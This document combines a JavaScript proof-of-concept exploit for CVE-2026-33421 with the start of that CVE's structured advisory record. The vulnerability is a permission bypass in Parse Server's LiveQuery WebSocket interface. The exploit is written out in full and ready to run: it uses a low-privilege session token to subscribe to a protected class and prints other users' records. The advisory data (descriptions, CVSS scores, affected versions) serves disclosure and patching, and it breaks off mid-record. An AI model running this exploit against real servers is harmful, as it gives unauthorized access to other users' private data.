CVE-2026-33421

const WebSocket = require('ws'); // Target configuration const LIVE_QUERY_URL = 'wss://target-parse-server.com/parse'; const APPLICATION_ID = 'YOUR_APP_ID'; // Attacker's low-privilege session token const SESSION_TOKEN = 'r:attacker_session_token'; const ws = new WebSocket(LIVE_QUERY_URL); ws.on('open', function open() { console.log('[+] Connected to LiveQuery server'); // 1. Send connection request const connectMessage = { op: 'connect', applicationId: APPLICATION_ID }; ws.send(JSON.stringify(connectMessage)); // 2. Subscribe to a protected class to bypass CLP pointer permissions // Assuming 'PrivateMessages' is a class with readUserFields restrictions const subscribeMessage = { op: 'subscribe', requestId: 1, query: { className: 'PrivateMessages', where: {} }, sessionToken: SESSION_TOKEN }; setTimeout(() => { console.log('[*] Subscribing to protected class...'); ws.send(JSON.stringify(subscribeMessage)); }, 1000); }); ws.on('message', function message(data) { const msg = JSON.parse(data); if (msg.op === 'create' || msg.op === 'update') { console.log('[!] Successfully received sensitive data via bypass:', msg.object); } }); ws.on('error', console.error);

{"cve": {"id": "CVE-2026-33421", "sourceIdentifier": "[email protected]", "published": "2026-03-24T19:16:53.713", "lastModified": "2026-03-25T21:22:58.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.53 and 9.6.0-alpha.42, Parse Server's LiveQuery WebSocket interface does not enforce Class-Level Permission (CLP) pointer permissions (readUserFields and pointerFields). Any authenticated user can subscribe to LiveQuery events and receive real-time updates for all objects in classes protected by pointer permissions, regardless of whether the pointer fields on those objects point to the subscribing user. This bypasses the intended read access control, allowing unauthorized access to potentially sensitive data that is correctly restricted via the REST API. This issue has been patched in versions 8.6.53 and 9.6.0-alpha.42."}, {"lang": "es", "value": "Parse Server es un backend de código abierto que puede ser desplegado en cualquier infraestructura que pueda ejecutar Node.js. Antes de las versiones 8.6.53 y 9.6.0-alpha.42, la interfaz LiveQuery WebSocket de Parse Server no aplica los permisos de puntero de Permiso a Nivel de Clase (CLP) (readUserFields y pointerFields). Cualquier usuario autenticado puede suscribirse a eventos LiveQuery y recibir actualizaciones en tiempo real para todos los objetos en clases protegidas por permisos de puntero, independientemente de si los campos de puntero en esos objetos apuntan al usuario suscriptor. Esto elude el control de acceso de lectura previsto, permitiendo el acceso no autorizado a datos potencialmente sensibles que están correctamente restringidos a través de la API REST. Este problema ha sido parcheado en las versiones 8.6.53 y 9.6.0-alpha.42."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "8.6.53", "matchCriteriaId": "3A57C95F-A3AA-44EC-AED8-9DDDF24712AA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.6.0", "matchCriteriaId": "1BAC01F8-0899-482C-8D91-64671BF2859A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha1:*:*:*:node.js:*:*", "matchCriteriaId": "BBED261F-CA1B-44BC-9C3A-37378590EFEE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha10:*:*:*:node.js:*:*", "matchCriteriaId": "418338C9-6AEC-492C-ACA4-9B3C0AAE149C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:parseplatform:parse-server:9.6.0:alpha11:*:*:*:node.js:*:*", "matchCr ... (truncated)